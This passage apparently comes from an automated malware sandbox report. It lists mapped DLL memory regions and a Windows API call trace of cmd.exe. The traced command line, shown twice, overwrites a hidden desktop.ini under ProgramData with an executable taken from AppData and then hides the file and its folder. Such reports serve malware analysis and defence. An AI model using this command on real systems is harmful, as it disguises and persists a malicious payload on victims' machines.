28607 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 28608 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 28609 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 28610 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 28611 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 28612 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 28613 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 28614 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 28615 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 28616 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 28617 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 28618 start_va = 0x190000 end_va = 0x196fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 28619 start_va = 0x1a0000 end_va = 0x1a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 28620 start_va = 0x2b0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 28621 start_va = 0x3c0000 end_va = 0x3c0fff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 28622 start_va = 0x3d0000 end_va = 0x3d0fff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 28623 start_va = 0x4e0000 end_va = 0x642fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 28624 start_va = 0x6e0000 end_va = 0x12dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006e0000" filename = "" Region: id = 28649 start_va = 0x12e0000 end_va = 0x15aefff entry_point = 0x12e0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 636 os_tid = 0xb0c [0194.369] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2afcfc | out: lpSystemTimeAsFileTime=0x2afcfc*(dwLowDateTime=0xa8b95560, dwHighDateTime=0x1d440a9)) [0194.369] GetCurrentProcessId () returned 0xacc [0194.369] GetCurrentThreadId () returned 0xb0c [0194.369] GetTickCount () returned 0x372fd [0194.369] QueryPerformanceCounter (in: lpPerformanceCount=0x2afcf4 | out: lpPerformanceCount=0x2afcf4*=25115789233) returned 1 [0194.369] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0194.369] __set_app_type (_Type=0x1) [0194.369] __p__fmode () returned 0x76b331f4 [0194.369] __p__commode () returned 0x76b331fc [0194.369] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0194.370] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0194.370] GetCurrentThreadId () returned 0xb0c [0194.370] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xb0c) returned 0x38 [0194.370] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0194.370] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0194.370] SetThreadUILanguage (LangId=0x0) returned 0x409 [0194.375] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0194.375] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2afc8c | out: phkResult=0x2afc8c*=0x0) returned 0x2 [0194.375] VirtualQuery (in: lpAddress=0x2afcc3, lpBuffer=0x2afc5c, dwLength=0x1c | out: lpBuffer=0x2afc5c*(BaseAddress=0x2af000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0194.375] VirtualQuery (in: lpAddress=0x1b0000, lpBuffer=0x2afc5c, dwLength=0x1c | out: lpBuffer=0x2afc5c*(BaseAddress=0x1b0000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0194.375] VirtualQuery (in: lpAddress=0x1b1000, lpBuffer=0x2afc5c, dwLength=0x1c | out: lpBuffer=0x2afc5c*(BaseAddress=0x1b1000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0194.375] VirtualQuery (in: lpAddress=0x1b3000, lpBuffer=0x2afc5c, dwLength=0x1c | out: lpBuffer=0x2afc5c*(BaseAddress=0x1b3000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0194.375] VirtualQuery (in: lpAddress=0x2b0000, lpBuffer=0x2afc5c, dwLength=0x1c | out: lpBuffer=0x2afc5c*(BaseAddress=0x2b0000, AllocationBase=0x2b0000, AllocationProtect=0x2, RegionSize=0x101000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0194.375] GetConsoleOutputCP () returned 0x1b5 [0194.375] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0194.375] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0194.375] _get_osfhandle (_FileHandle=1) returned 0x7 [0194.375] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0194.375] _get_osfhandle (_FileHandle=1) returned 0x7 [0194.375] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0194.376] _get_osfhandle (_FileHandle=1) returned 0x7 [0194.376] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0194.376] _get_osfhandle (_FileHandle=0) returned 0x3 [0194.376] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0194.376] _get_osfhandle (_FileHandle=0) returned 0x3 [0194.376] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0194.377] GetEnvironmentStringsW () returned 0x3f0428* [0194.378] FreeEnvironmentStringsW (penv=0x3f0428) returned 1 [0194.378] GetEnvironmentStringsW () returned 0x3f0428* [0194.378] FreeEnvironmentStringsW (penv=0x3f0428) returned 1 [0194.378] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2aebfc | out: phkResult=0x2aebfc*=0x40) returned 0x0 [0194.378] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2aec04, lpData=0x2aec08, lpcbData=0x2aec00*=0x1000 | out: lpType=0x2aec04*=0x0, lpData=0x2aec08*=0xd8, lpcbData=0x2aec00*=0x1000) returned 0x2 [0194.378] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2aec04, lpData=0x2aec08, lpcbData=0x2aec00*=0x1000 | out: lpType=0x2aec04*=0x4, lpData=0x2aec08*=0x1, lpcbData=0x2aec00*=0x4) returned 0x0 [0194.378] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2aec04, lpData=0x2aec08, lpcbData=0x2aec00*=0x1000 | out: lpType=0x2aec04*=0x0, lpData=0x2aec08*=0x1, lpcbData=0x2aec00*=0x1000) returned 0x2 [0194.378] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2aec04, lpData=0x2aec08, lpcbData=0x2aec00*=0x1000 | out: lpType=0x2aec04*=0x4, lpData=0x2aec08*=0x0, lpcbData=0x2aec00*=0x4) returned 0x0 [0194.378] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2aec04, lpData=0x2aec08, lpcbData=0x2aec00*=0x1000 | out: lpType=0x2aec04*=0x4, lpData=0x2aec08*=0x40, lpcbData=0x2aec00*=0x4) returned 0x0 [0194.378] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2aec04, lpData=0x2aec08, lpcbData=0x2aec00*=0x1000 | out: lpType=0x2aec04*=0x4, lpData=0x2aec08*=0x40, lpcbData=0x2aec00*=0x4) returned 0x0 [0194.378] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2aec04, lpData=0x2aec08, lpcbData=0x2aec00*=0x1000 | out: lpType=0x2aec04*=0x0, lpData=0x2aec08*=0x40, lpcbData=0x2aec00*=0x1000) returned 0x2 [0194.378] RegCloseKey (hKey=0x40) returned 0x0 [0194.378] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2aebfc | out: phkResult=0x2aebfc*=0x40) returned 0x0 [0194.378] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2aec04, lpData=0x2aec08, lpcbData=0x2aec00*=0x1000 | out: lpType=0x2aec04*=0x0, lpData=0x2aec08*=0x40, lpcbData=0x2aec00*=0x1000) returned 0x2 [0194.378] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2aec04, lpData=0x2aec08, lpcbData=0x2aec00*=0x1000 | out: lpType=0x2aec04*=0x4, lpData=0x2aec08*=0x1, lpcbData=0x2aec00*=0x4) returned 0x0 [0194.378] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2aec04, lpData=0x2aec08, lpcbData=0x2aec00*=0x1000 | out: lpType=0x2aec04*=0x0, lpData=0x2aec08*=0x1, lpcbData=0x2aec00*=0x1000) returned 0x2 [0194.378] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2aec04, lpData=0x2aec08, lpcbData=0x2aec00*=0x1000 | out: lpType=0x2aec04*=0x4, lpData=0x2aec08*=0x0, lpcbData=0x2aec00*=0x4) returned 0x0 [0194.378] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2aec04, lpData=0x2aec08, lpcbData=0x2aec00*=0x1000 | out: lpType=0x2aec04*=0x4, lpData=0x2aec08*=0x9, lpcbData=0x2aec00*=0x4) returned 0x0 [0194.378] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2aec04, lpData=0x2aec08, lpcbData=0x2aec00*=0x1000 | out: lpType=0x2aec04*=0x4, lpData=0x2aec08*=0x9, lpcbData=0x2aec00*=0x4) returned 0x0 [0194.378] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2aec04, lpData=0x2aec08, lpcbData=0x2aec00*=0x1000 | out: lpType=0x2aec04*=0x0, lpData=0x2aec08*=0x9, lpcbData=0x2aec00*=0x1000) returned 0x2 [0194.379] RegCloseKey (hKey=0x40) returned 0x0 [0194.379] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88639c [0194.379] srand (_Seed=0x5b88639c) [0194.379] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~2\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\MICROS~2\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\MICROS~2\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~2\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~2\"" [0194.379] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~2\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\MICROS~2\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\MICROS~2\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~2\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~2\"" [0194.379] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0194.379] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3f1b88, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0194.379] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0194.379] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0194.379] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0194.379] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0194.379] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0194.379] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0194.379] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0194.379] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0194.379] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0194.379] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0194.379] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0194.379] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0194.380] GetEnvironmentStringsW () returned 0x3f2578* [0194.380] FreeEnvironmentStringsW (penv=0x3f2578) returned 1 [0194.380] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0194.380] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0194.380] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0194.380] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0194.380] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0194.380] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0194.380] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0194.380] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0194.380] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0194.380] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0194.380] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2af9c8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0194.380] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2af9c8, lpFilePart=0x2af9c4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2af9c4*="Desktop") returned 0x18 [0194.380] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0194.380] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2af744 | out: lpFindFileData=0x2af744) returned 0x3f0c08 [0194.380] FindClose (in: hFindFile=0x3f0c08 | out: hFindFile=0x3f0c08) returned 1 [0194.380] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2af744 | out: lpFindFileData=0x2af744) returned 0x3f0c08 [0194.381] FindClose (in: hFindFile=0x3f0c08 | out: hFindFile=0x3f0c08) returned 1 [0194.381] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2af744 | out: lpFindFileData=0x2af744) returned 0x3f0c08 [0194.381] FindClose (in: hFindFile=0x3f0c08 | out: hFindFile=0x3f0c08) returned 1 [0194.381] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0194.381] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0194.381] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0194.381] GetEnvironmentStringsW () returned 0x3f0428* [0194.381] FreeEnvironmentStringsW (penv=0x3f0428) returned 1 [0194.381] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0194.381] GetConsoleOutputCP () returned 0x1b5 [0194.390] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0194.390] GetUserDefaultLCID () returned 0x409 [0194.391] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0194.391] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2afb08, cchData=128 | out: lpLCData="0") returned 2 [0194.391] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2afb08, cchData=128 | out: lpLCData="0") returned 2 [0194.391] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2afb08, cchData=128 | out: lpLCData="1") returned 2 [0194.391] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0194.391] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0194.391] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0194.391] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0194.391] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0194.391] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0194.391] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0194.391] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0194.392] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0194.392] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0194.392] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0194.393] GetConsoleTitleW (in: lpConsoleTitle=0x3e0a78, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0194.393] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0194.393] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0194.393] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0194.393] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0194.394] _wcsicmp (_String1="attrib", _String2=")") returned 56 [0194.394] _wcsicmp (_String1="FOR", _String2="attrib") returned 5 [0194.394] _wcsicmp (_String1="FOR/?", _String2="attrib") returned 5 [0194.394] _wcsicmp (_String1="IF", _String2="attrib") returned 8 [0194.395] _wcsicmp (_String1="IF/?", _String2="attrib") returned 8 [0194.395] _wcsicmp (_String1="REM", _String2="attrib") returned 17 [0194.395] _wcsicmp (_String1="REM/?", _String2="attrib") returned 17 [0194.397] _wcsicmp (_String1="del", _String2=")") returned 59 [0194.397] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0194.397] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0194.397] _wcsicmp (_String1="IF", _String2="del") returned 5 [0194.397] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0194.397] _wcsicmp (_String1="REM", _String2="del") returned 14 [0194.397] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0194.399] _wcsicmp (_String1="type", _String2=")") returned 75 [0194.399] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0194.399] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0194.399] _wcsicmp (_String1="IF", _String2="type") returned -11 [0194.399] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0194.399] _wcsicmp (_String1="REM", _String2="type") returned -2 [0194.399] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0194.403] _wcsicmp (_String1="FOR", _String2="attrib") returned 5 [0194.403] _wcsicmp (_String1="FOR/?", _String2="attrib") returned 5 [0194.403] _wcsicmp (_String1="IF", _String2="attrib") returned 8 [0194.403] _wcsicmp (_String1="IF/?", _String2="attrib") returned 8 [0194.403] _wcsicmp (_String1="REM", _String2="attrib") returned 17 [0194.403] _wcsicmp (_String1="REM/?", _String2="attrib") returned 17 [0194.525] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0194.525] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0194.539] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0194.540] FindClose (in: hFindFile=0x3f2528 | out: hFindFile=0x3f2528) returned 1 [0194.540] FindClose (in: hFindFile=0x3f2528 | out: hFindFile=0x3f2528) returned 1 [0194.540] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0194.540] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0194.540] GetConsoleTitleW (in: lpConsoleTitle=0x2af530, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0194.540] InitializeProcThreadAttributeList (in: lpAttributeList=0x2af3b8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2af480 | out: lpAttributeList=0x2af3b8, lpSize=0x2af480) returned 1 [0194.540] UpdateProcThreadAttribute (in: lpAttributeList=0x2af3b8, dwFlags=0x0, Attribute=0x60001, lpValue=0x2af478, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2af3b8, lpPreviousValue=0x0) returned 1 [0194.540] GetStartupInfoW (in: lpStartupInfo=0x2af374 | out: lpStartupInfo=0x2af374*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0194.541] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0194.542] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~2\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x2af414*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~2\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2af460 | out: lpCommandLine="attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~2\\desktop.ini\" ", lpProcessInformation=0x2af460*(hProcess=0x50, hThread=0x4c, dwProcessId=0xb28, dwThreadId=0xb74)) returned 1 [0194.544] CloseHandle (hObject=0x4c) returned 1 [0194.544] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0194.544] GetEnvironmentStringsW () returned 0x3f0858* [0194.544] FreeEnvironmentStringsW (penv=0x3f0858) returned 1 [0194.544] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0194.769] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x2af354 | out: lpExitCode=0x2af354*=0x0) returned 1 [0194.769] CloseHandle (hObject=0x50) returned 1 [0194.769] _vsnwprintf (in: _Buffer=0x2af49c, _BufferCount=0x13, _Format="%08X", _ArgList=0x2af360 | out: _Buffer="00000000") returned 8 [0194.769] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0194.769] GetEnvironmentStringsW () returned 0x3f2548* [0194.770] FreeEnvironmentStringsW (penv=0x3f2548) returned 1 [0194.770] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0194.770] GetEnvironmentStringsW () returned 0x3f2548* [0194.770] FreeEnvironmentStringsW (penv=0x3f2548) returned 1 [0194.770] DeleteProcThreadAttributeList (in: lpAttributeList=0x2af3b8 | out: lpAttributeList=0x2af3b8) [0194.770] GetConsoleTitleW (in: lpConsoleTitle=0x2af738, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0194.770] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\desktop.ini" (normalized: "c:\\users\\alluse~1\\micros~2\\desktop.ini")) returned 0xffffffff [0194.770] GetLastError () returned 0x2 [0194.770] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2" (normalized: "c:\\users\\alluse~1\\micros~2")) returned 0x2010 [0194.771] _wcsicmp (_String1="desktop.ini", _String2=".") returned 54 [0194.771] _wcsicmp (_String1="desktop.ini", _String2="..") returned 54 [0194.771] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\desktop.ini" (normalized: "c:\\users\\alluse~1\\micros~2\\desktop.ini")) returned 0xffffffff [0194.771] GetLastError () returned 0x2 [0194.771] 